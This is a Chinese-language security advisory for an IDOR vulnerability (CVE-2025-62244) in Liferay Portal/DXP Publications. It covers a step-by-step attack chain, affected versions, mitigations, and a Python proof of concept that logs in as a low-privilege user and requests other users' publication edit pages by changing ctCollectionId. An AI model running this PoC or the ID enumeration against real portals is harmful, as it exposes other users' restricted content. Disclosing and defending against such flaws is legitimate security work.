CVE-2025-62244 Liferay Portal Publications IDOR漏洞

漏洞信息

漏洞编号

CVE-2025-62244

漏洞类型

不安全的直接对象引用（IDOR）

CVSS评分

4.3 中危

攻击向量

网络 (AV:N)

认证要求

低权限 (PR:L)

用户交互

无需交互 (UI:N)

影响产品

Liferay Portal / Liferay DXP

漏洞概述

CVE-2025-62244是Liferay Portal和Liferay DXP中Publications（出版物）功能模块存在的不安全直接对象引用（IDOR）漏洞。该漏洞由[email protected]团队发现并报告，CVSS评分为4.3分，属于中危级别。

Publications是Liferay平台中用于变更追踪（Change Tracking）的功能，允许用户在不同的出版物（Publication）中管理内容修改。该漏洞存在于PublicationsPortlet组件中，攻击者可以通过构造特定的请求参数 `_com_liferay_change_tracking_web_portlet_PublicationsPortlet_ctCollectionId` 来访问其他用户的出版物编辑页面，而无需进行适当的权限验证。

该漏洞影响多个版本的Liferay产品，包括Liferay Portal 7.3.1至7.4.3.111，以及Liferay DXP的多个季度版本（2023.Q3和2023.Q4系列）和GA更新版本。由于该漏洞需要低权限认证（PR:L）即可利用，且无需用户交互（UI:N），任何拥有有效Liferay账户的低权限用户都可能利用此漏洞查看本不应有权限访问的出版物编辑页面，导致信息泄露风险。虽然该漏洞不会直接影响系统的完整性和可用性，但可能泄露敏感的出版物配置信息和内容变更详情。

技术细节

该漏洞的核心原理在于PublicationsPortlet组件在处理用户请求时，未对传入的 `ctCollectionId` 参数进行充分的访问控制验证。具体而言，当用户请求查看某个出版物的编辑页面时，系统仅根据URL或请求参数中传入的集合标识符（ctCollectionId）来确定要加载的出版物资源，而没有验证当前认证用户是否拥有访问该特定出版物的权限。

利用方式如下：
1. 攻击者首先需要拥有一个有效的Liferay Portal/DXP账户（任何低权限账户即可）。
2. 攻击者通过合法途径获取或枚举目标出版物的ctCollectionId值（该值通常为递增的数字标识符）。
3. 攻击者构造包含恶意ctCollectionId参数的请求，访问PublicationsPortlet的编辑页面端点。
4. 由于缺少权限校验，服务端直接返回目标出版物的编辑页面内容，包括出版物名称、描述、变更内容等敏感信息。

该漏洞属于典型的IDOR（Insecure Direct Object Reference）漏洞类别，是Web应用中常见的安全问题。其根本原因是在对象级别的访问控制中，开发人员仅依赖用户提供的输入（如ID参数）来定位和返回资源，而未结合基于角色的访问控制（RBAC）或属性级别的访问控制（ABAC）进行二次验证。

攻击链分析

STEP 1

步骤1：获取有效凭证

攻击者获取或注册一个Liferay Portal/DXP的低权限用户账户，该账户需要对PublicationsPortlet有基本访问权限。

STEP 2

步骤2：枚举目标出版物ID

通过合法途径或暴力枚举方式获取目标出版物的ctCollectionId值，这些值通常为可预测的递增整数。

STEP 3

步骤3：构造恶意请求

攻击者构造包含目标ctCollectionId参数的Publications编辑页面访问请求，利用_com_liferay_change_tracking_web_portlet_PublicationsPortlet_ctCollectionId参数绕过权限验证。

STEP 4

步骤4：访问受限资源

服务端未对ctCollectionId进行权限校验，直接返回目标出版物的编辑页面内容，攻击者成功获取未经授权的出版物信息。

STEP 5

步骤5：信息提取

从返回的编辑页面中提取敏感的出版物配置信息、变更内容、用户权限设置等数据，造成信息泄露。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# CVE-2025-62244 PoC - Liferay Portal Publications IDOR # This PoC demonstrates how an authenticated low-privilege user can # access the edit page of publications they should not have access to # by manipulating the ctCollectionId parameter. import requests # Target Liferay Portal/DXP instance TARGET_URL = "https://target-liferay-instance.com" # Authenticated session (attacker needs a valid low-privilege account) session = requests.Session() # Step 1: Authenticate to the Liferay portal login_url = f"{TARGET_URL}/c/portal/login" login_data = { "_com_liferay_login_web_portlet_LoginPortlet_cmd": "authenticate", "_com_liferay_login_web_portlet_LoginPortlet_redirect": "/web/guest/home", "_com_liferay_login_web_portlet_LoginPortlet_emailAddress": "[email protected]", "_com_liferay_login_web_portlet_LoginPortlet_password": "password123" } session.post(login_url, data=login_data) # Step 2: Enumerate target publication IDs (ctCollectionId values) # These are typically sequential integers - brute force or guess valid IDs target_ct_collection_id = 1 # Target publication ID to access # Step 3: Exploit the IDOR vulnerability by accessing the Publications edit page # with the manipulated ctCollectionId parameter exploit_url = ( f"{TARGET_URL}/group/control_panel/manage" f"?p_p_id=com_liferay_change_tracking_web_portlet_PublicationsPortlet" f"&p_p_lifecycle=0" f"&p_p_state=maximized" f"&_com_liferay_change_tracking_web_portlet_PublicationsPortlet_mvcRenderCommandName=%2Fchange_tracking%2Fview_publication" f"&_com_liferay_change_tracking_web_portlet_PublicationsPortlet_ctCollectionId={target_ct_collection_id}" ) response = session.get(exploit_url) # Step 4: Check if the exploit was successful if response.status_code == 200 and "Publication" in response.text: print(f"[+] IDOR exploit successful! Accessed publication ID: {target_ct_collection_id}") # Extract sensitive publication information from the response print(response.text[:2000]) else: print(f"[-] Exploit failed. Status code: {response.status_code}") # Alternative: Direct URL-based exploitation # Simply navigate to the URL with the target ctCollectionId parameter # while authenticated as any user with portal access.

影响范围

Liferay Portal 7.3.1 - 7.4.3.111

Liferay DXP 2023.Q4.0 - 2023.Q4.5

Liferay DXP 2023.Q3.1 - 2023.Q3.8

Liferay DXP 7.4 GA - update 92

Liferay DXP 7.3 GA - update 36

防御指南

临时缓解措施

在无法立即升级的情况下，建议采取以下临时缓解措施：1）限制低权限用户对PublicationsPortlet的访问权限，仅授予必要的最小权限；2）在反向代理或WAF层面添加规则，对包含ctCollectionId参数的请求进行访问控制检查；3）监控异常的Publications编辑页面访问行为，特别是来自低权限账户的大量不同ctCollectionId访问请求；4）定期审查和清理不再需要的出版物，减少攻击面；5）考虑在应用层面临时禁用Publications功能，直到补丁可以应用。